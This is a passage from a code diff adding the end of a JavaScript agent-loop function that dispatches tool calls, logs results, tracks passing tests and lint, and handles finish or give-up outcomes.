+ onEvent({ type: 'tool_call', turn, name: call.name, preview: previewInput(call.input) });
117
+ const result = await dispatchTool(call.name, call.input, ctx);
118
+ onEvent({
119
+ type: 'tool_result', turn, name: call.name,
120
+ ok: result.ok, error: result.error,
121
+ flaky: result.flaky, attempts: result.attempts
122
+ });
123
+
124
+ history.push({ turn, kind: 'tool', name: call.name, input: call.input, result });
125
+
126
+ if (call.name === 'run_tests' && result.ok && result.passed) {
127
+ sawPassingTests = true;
128
+ }
129
+ if (call.name === 'run_lint' && result.ok) {
130
+ sawPassingLint = result.passed;
131
+ }
132
+
133
+ toolResults.push({
134
+ type: 'tool_result',
135
+ tool_use_id: call.id,
136
+ content: JSON.stringify(result),
137
+ is_error: !result.ok
138
+ });
139
+
140
+ if (call.name === 'finish' && result.ok) {
141
+ finalSummary = call.input.pr_summary;
142
+ }
143
+ if (call.name === 'give_up' && result.ok) {
144
+ gaveUp = {
145
+ reason: result.reason,
146
+ explanation: result.explanation,
147
+ blockers: result.blockers
148
+ };
149
+ aborted = 'gave_up';
150
+ }
151
+ }
152
+
153
+ messages.push({ role: 'user', content: toolResults });
154
+
155
+ if (finalSummary) {
156
+ onEvent({ type: 'finished', turn, summary: finalSummary });
157
+ break;
158
+ }
159
+ if (gaveUp) {
160
+ onEvent({ type: 'gave_up', turn, ...gaveUp });
161
+ break;
162
+ }
163
+ }
164
+
165
+ if (!finalSummary && !aborted && turn > maxIterations) {
166
+ onEvent({ type: 'iteration_limit', turn: maxIterations });
167
+ }
168
+
169
+ return {
170
+ usage, history, finalSummary,
171
+ completedTurns: turn, stopReason, aborted,
172
+ sawPassingTests, sawPassingLint, gaveUp
173
+ };
174
+ }
175
+
176
+ module.exports = { runAgentLoop, callWithRetry, isRetryable };